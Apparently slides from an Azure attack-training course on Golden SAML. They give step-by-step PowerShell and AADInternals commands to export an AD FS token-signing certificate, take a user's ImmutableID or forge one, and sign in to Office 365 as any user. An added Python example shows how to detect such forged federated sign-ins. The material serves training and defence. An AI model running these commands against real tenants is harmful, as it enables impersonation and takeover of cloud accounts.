Federation
In AD FS, the SAML Response is signed by a token-signing certificate.
• If the certificate is compromised, it is possible to authenticate to Entra ID as ANY user in Entra ID!
• Just like our PTA abuse, a password change for the user or MFA has no effect, because we are forging the authentication response.
• The certificate can be extracted from the AD FS server with DA privileges and then used from any internet-connected machine.
• This is what the infamous Golden SAML attack is!
Attacking Azure © Altered Security. All rights reserved

Lateral Movement - Federation - On-Prem to Cloud
• From any on-prem machine, as a normal domain user, get the ImmutableID of the target user:
  [System.Convert]::ToBase64String((Get-ADUser -Identity onpremuser | select -ExpandProperty ObjectGUID).tobytearray())
• On the AD FS server (as administrator), get the IssuerURI:
  Get-AdfsProperties | select identifier
• Check the IssuerURI from Entra ID too (uses the MSOL module and needs GA privileges):
  Get-MsolDomainFederationSettings -DomainName deffin.com | select IssuerUri
Note: When AD FS is set up using Entra Connect, the IssuerURI on the AD FS server differs from the one in Entra ID. Use the one from Azure AD.

Lateral Movement - Federation - On-Prem to Cloud
• With DA privileges on-prem, we can extract the AD FS token-signing certificate from the AD FS server using AADInternals:
  Export-AADIntADFSSigningCertificate
• Use the command below from AADInternals to access cloud apps as the user whose ImmutableID is specified:
  Open-AADIntOffice365Portal -ImmutableID v1pOC7Pz8kaT6JWtThJKRQ== -Issuer http://deffin.com/adfs/services/trust -PfxFileName C:\users\adfsadmin\Documents\ADFSSigningCertificate.pfx -Verbose

Lateral Movement - Federation - On-Prem to Cloud
With DA privileges on-prem and access to the Entra Connect Sync credentials, it is possible to create an ImmutableID for cloud-only users!
• Create a realistic ImmutableID and set it for a cloud-only user:
  [System.Convert]::ToBase64String((New-Guid).tobytearray())
  Set-AADIntAzureADObject -CloudAnchor "User_594e67c3-c39b-41bb-ac50-cd8cd8bb780f" -SourceAnchor "pwrtlmsicU+5tgCUgHx2tA=="
• Using AADInternals, export the token-signing certificate:
  Export-AADIntADFSSigningCertificate
• Use the command below from AADInternals to access cloud apps as the user whose ImmutableID is specified:
  Open-AADIntOffice365Portal -ImmutableID pwrtlmsicU+5tgCUgHx2tA== -Issuer http://deffin.com/adfs/services/trust -PfxFileName C:\users\adfsadmin\Desktop\ADFSSigningCertificate.pfx -Verbose
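The defensive counterpart to both techniques above, as an added example that is not part of the course material: a forged SAML response reaches Entra ID without AD FS ever issuing a token, and the ImmutableID variant leaves a cloud-only account carrying a source anchor that Entra Connect never wrote. The sign-in records, AD FS audit events and directory state below are constructed, simplified samples (field names are assumptions, not the real log schemas); the correlation logic is what a detection would do over the real Entra ID sign-in logs and AD FS token-issuance audits.

```python
from datetime import datetime, timedelta

# Constructed Entra ID sign-ins that were satisfied by the federated IdP
# (i.e. a SAML response was presented). Field names are assumptions.
ENTRA_SIGNINS = [
    {"user": "onpremuser@deffin.com", "time": "2024-05-01T10:00:05", "federated": True},
    {"user": "clouduser@deffin.com", "time": "2024-05-01T10:30:00", "federated": True},
    {"user": "onpremuser@deffin.com", "time": "2024-05-01T11:15:00", "federated": True},
]
# Constructed AD FS security-audit "token issued" events. Only one genuine
# AD FS issuance exists; every other federated sign-in above is suspect.
ADFS_TOKEN_EVENTS = [
    {"user": "onpremuser@deffin.com", "time": "2024-05-01T10:00:01"},
]
# Constructed directory state: whether Entra Connect syncs the account,
# and the ImmutableID (source anchor) currently stored on it.
DIRECTORY = {
    "onpremuser@deffin.com": {"synced": True, "immutable_id": "v1pOC7Pz8kaT6JWtThJKRQ=="},
    "clouduser@deffin.com": {"synced": False, "immutable_id": "pwrtlmsicU+5tgCUgHx2tA=="},
    "other@deffin.com": {"synced": False, "immutable_id": None},
}


def _ts(value):
    return datetime.fromisoformat(value)


def orphan_federated_signins(signins, adfs_events, window_s=120):
    """Return (user, time) for federated sign-ins with no AD FS token-issuance
    event for the same user in the preceding `window_s` seconds. Entra ID
    accepting a SAML response that AD FS never produced is the Golden SAML
    signature: the token-signing certificate was used outside AD FS."""
    issued = [(e["user"], _ts(e["time"])) for e in adfs_events]
    orphans = []
    for s in signins:
        if not s["federated"]:
            continue
        t = _ts(s["time"])
        backed = any(u == s["user"] and timedelta(0) <= t - it <= timedelta(seconds=window_s)
                     for u, it in issued)
        if not backed:
            orphans.append((s["user"], s["time"]))
    return orphans


def cloud_only_with_anchor(directory):
    """Return cloud-only accounts that nonetheless carry an ImmutableID. Entra
    Connect only writes source anchors for synced objects, so an anchor on an
    unsynced account is the trace of the forged-ImmutableID variant."""
    return sorted(u for u, a in directory.items() if not a["synced"] and a["immutable_id"])
```

In production the first check needs AD FS auditing enabled and the clocks of both sources aligned; a lag larger than the window produces false positives, so tune `window_s` to the observed issuance-to-sign-in delay.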